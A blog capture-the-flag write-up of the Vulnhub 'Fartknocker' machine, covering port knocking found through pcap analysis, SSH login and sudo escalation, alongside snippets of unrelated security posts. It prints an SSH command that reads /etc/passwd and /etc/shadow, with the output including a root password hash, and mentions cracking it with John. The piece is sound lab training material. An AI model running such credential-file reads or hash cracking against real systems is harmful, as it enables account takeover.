Security Testing for entities hosted in cloud

For the applications that are getting migrated to cloud / planned to be hosted in the cloud will need additional security considerations. Failure to ensure proper security protection when using cloud services may potentially result in higher costs and loss to business. Organizations must consider security controls for different services viz. Infrastructures as a service(Iaas), Software as a service (SaaS) or Platform as a service. Which applications should be moved to cloud?     ·         Low to Medium Risk What are the key security risks while hosting in cloud?     ·         Isolation Failure – Multi tenancy is a key thing in cloud. Failure in controls that separate the storage, memory, identity and access control and routing between tenants is a huge risk.     ·         Authentication and Authorization     ·...
Post a Comment

Vulnhub_Fartknocker_Challenge_Writeup

I have always been using vulnhub for getting exciting challenges for practice. I am very thankful to team vulnhub.

Recently few of my friends who are good penetration testers failed a challenge as they could not discover anything except a web port. When I asked them if they checked the port knocking on the target ???? Well I thought this is a great opportunity to start submitting my attempts to vulnhub challenges. I wrote this challenge while explaining this to my friends.

1] Discovering target


2] nmap scan


















3] Interacting with target on open port









clicking on the Wooah opened up a pcap file:










4] Looking at tte TCP traffic for Dst Port and Seq: 0 and Len: 0 we get the following ports in following sequence:

7000
8000
9000

7000
8000
9000
8888

looking at this it is very clear that this is a port knocking challenge:

So lets knock the ports - we can write a script for this however since this is just 7 ports we will directly knock the ports:








5] now we have port 8888 open and a new directory /burgerworld/

lets open this in browser:









6] let's click on hehh...hehh and hope to get another pcap

yes we got another pcap file

before dealing with this lets do a quick nmap on port 8888 - we may be able to utilize this later:














7] okay now let us look at the new pcap file:

looking at it it seems there is communication attempts on 21, 80, 8080 and 22 however there is no knocking sequence visible:

a quick nmap scan against these ports as well did not reveal anything useful.

Tried to open the tcp stream in wireshark and got this:














At 1st I did not understand what this means - but after reading it outloud a couple of times it sounded simillar to something 3 3 7 - bingo this might be 1337

Confirmed it with google:





let's try and knock these ports










Brilliant

now we have one more directory: /iamcornholio/

lets open in browser.











This looks like some encoded text

Lets try a base 64 decode on this:





Great - so now we have the knocking sequence to open SSH

let's knock it










awesome!!!

now that we have ssh open lets try to interact with it.








so now we have a ssh username and password as well - didn't hope to get it served so easily

let's try to login:










good. So this is just for a blink. but we can surely use ssh to run commands here.







so we issued 4 commands here:

ls

cat /etc/passwd

cat /etc/shadow

uname -a

the target responded positively for all of them :)

yes we got both shadow and passwd files here is the output:

----------------------------------------------------------------------------------------------------------------------------
root@kali:~# ssh butthead@10.0.2.15 ls && cat /etc/passwd && cat /etc/shadow && uname -a
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################
butthead@10.0.2.15's password:
nachos
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
colord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
miredo:x:105:65534::/var/run/miredo:/bin/false
ntp:x:106:112::/home/ntp:/bin/false
Debian-exim:x:107:113::/var/spool/exim4:/bin/false
arpwatch:x:108:116:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
avahi:x:109:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
beef-xss:x:110:118::/var/lib/beef-xss:/bin/false
dradis:x:111:120::/var/lib/dradis:/bin/false
pulse:x:112:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
haldaemon:x:114:123:Hardware abstraction layer,,,:/var/run/hald:/bin/false
sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin
snmp:x:116:125::/var/lib/snmp:/bin/false
iodine:x:117:65534::/var/run/iodine:/bin/false
postgres:x:118:127:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
redsocks:x:119:128::/var/run/redsocks:/bin/false
stunnel4:x:120:129::/var/run/stunnel4:/bin/false
statd:x:121:65534::/var/lib/nfs:/bin/false
sslh:x:122:132::/nonexistent:/bin/false
Debian-gdm:x:123:133:Gnome Display Manager:/var/lib/gdm3:/bin/false
rtkit:x:124:134:RealtimeKit,,,:/proc:/bin/false
saned:x:125:135::/home/saned:/bin/false
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
redis:x:126:136:redis server,,,:/var/lib/redis:/bin/false
root:$6$5TZ6s8Rf$xTerBGvbFGqYM/dUVSe6qvE1J4vBd/JsTEPISFPqMPUl0fKC4YnuGpAsuh0vG0vacYxClaZwINrly4B2dRAz00:16590:0:99999:7:::
daemon:*:16506:0:99999:7:::
bin:*:16506:0:99999:7:::
sys:*:16506:0:99999:7:::
sync:*:16506:0:99999:7:::
games:*:16506:0:99999:7:::
man:*:16506:0:99999:7:::
lp:*:16506:0:99999:7:::
mail:*:16506:0:99999:7:::
news:*:16506:0:99999:7:::
uucp:*:16506:0:99999:7:::
proxy:*:16506:0:99999:7:::
www-data:*:16506:0:99999:7:::
backup:*:16506:0:99999:7:::
list:*:16506:0:99999:7:::
irc:*:16506:0:99999:7:::
gnats:*:16506:0:99999:7:::
nobody:*:16506:0:99999:7:::
libuuid:!:16506:0:99999:7:::
mysql:!:16506:0:99999:7:::
messagebus:*:16506:0:99999:7:::
colord:*:16506:0:99999:7:::
usbmux:*:16506:0:99999:7:::
miredo:*:16506:0:99999:7:::
ntp:*:16506:0:99999:7:::
Debian-exim:!:16506:0:99999:7:::
arpwatch:!:16506:0:99999:7:::
avahi:*:16506:0:99999:7:::
beef-xss:*:16506:0:99999:7:::
dradis:*:16506:0:99999:7:::
pulse:*:16506:0:99999:7:::
speech-dispatcher:!:16506:0:99999:7:::
haldaemon:*:16506:0:99999:7:::
sshd:*:16506:0:99999:7:::
snmp:*:16506:0:99999:7:::
iodine:*:16506:0:99999:7:::
postgres:*:16506:0:99999:7:::
redsocks:!:16506:0:99999:7:::
stunnel4:!:16506:0:99999:7:::
statd:*:16506:0:99999:7:::
sslh:!:16506:0:99999:7:::
Debian-gdm:*:16506:0:99999:7:::
rtkit:*:16506:0:99999:7:::
saned:*:16506:0:99999:7:::
vboxadd:!:16590::::::
redis:!:16600:0:99999:7:::
Linux kali 3.18.0-kali3-686-pae #1 SMP Debian 3.18.6-1~kali2 (2015-03-02) i686 GNU/Linux
root@kali:~#
-----------------------------------------------------------------------------------------------------------------------------------

now the best bet is to use the shadow and passwd files and hand them over to John

but lets cat the file that we got as a result of ls










so we kinda got our 1st flag :)

from the shadoow and passwd files we already know that these users exist.

but before we do that let's try this:

Searched internet for the story around beavis , butthead fartknocker etc and got this: (My idea was to get to some story and gather a good wordlist using 'kewl')









As it was created by mikejudge I tried that 1st - before bruteforcing:







and yes we are in.

Now time to gear up to get root

1st step we always try is to try sudo





Yeppie !!! We got Root....









This was an interesting challenge and my 1st write-up for vulnhub. Thank you.


Harshwardhan Kamdi
(@G0tD4un1k)









Comments

Post a Comment

Popular posts from this blog

Change the default SSH keys in Kali Linux ......One important step post installation

All of know that we can authenticate to a box without password if you have the SSH keys. The Kali images have known ssh keys and must be changed.  Here is how you can do this:  Move the default Kali ssh keys to a new folder: cd /etc/ssh/ mkdir default_kali_keys mv ssh_host_* default_kali_keys/ This will move your default keys to the new folder... Regenerate the keys: dpkg-reconfigure openssh-server Creating SSH2 RSA key; this may take some time ... Creating SSH2 DSA key; this may take some time ... Creating SSH2 ECDSA key; this may take some time ... insserv: warning: current start runlevel(s) (empty) of script `ssh' overrides LSB defaults (2 3 4 5). insserv: warning: current stop runlevel(s) (2 3 4 5) of script `ssh' overrides LSB defaults (empty). Verify ssh key hashes are different: md5sum ssh_host_* Compare new key hashes to the hashes below) cd default_kali_keys/ md5sum * b9419ea3a8fff086c258740e89ca86b8 ssh_host_dsa_key f9a5b57d7004e3740d07c5b037d15730 ssh_host_dsa_key.p...
Read more

Keeping logs of your console commands during pentesting

Image
While it is very important to keep the screenshots and the results of your tools logged and recorded correctly, consistently and extensively, it is equally important to keep your console logs. This is very helpful when you are done with your penetration test and recall later during the results analysis / report writing that - what was the result of 'that' command I ran??? It is very commonly missed out by most pentesters - at least the beginners. While there are many ways in which you can do this: 1] copy paste the console logs and save it in your fav text editor 2] use a systematic approach I am sure method [1] is known to all :) Let's learn method [2] - Use script yes there is in inbuilt tool / script in linux that you can make use of: script usage: script filename.log This will start a process and it will keep logging the console output to this file. Once you are done just 'exit' Not to mention that care must be taken that you do not exit this process in between ...
Read more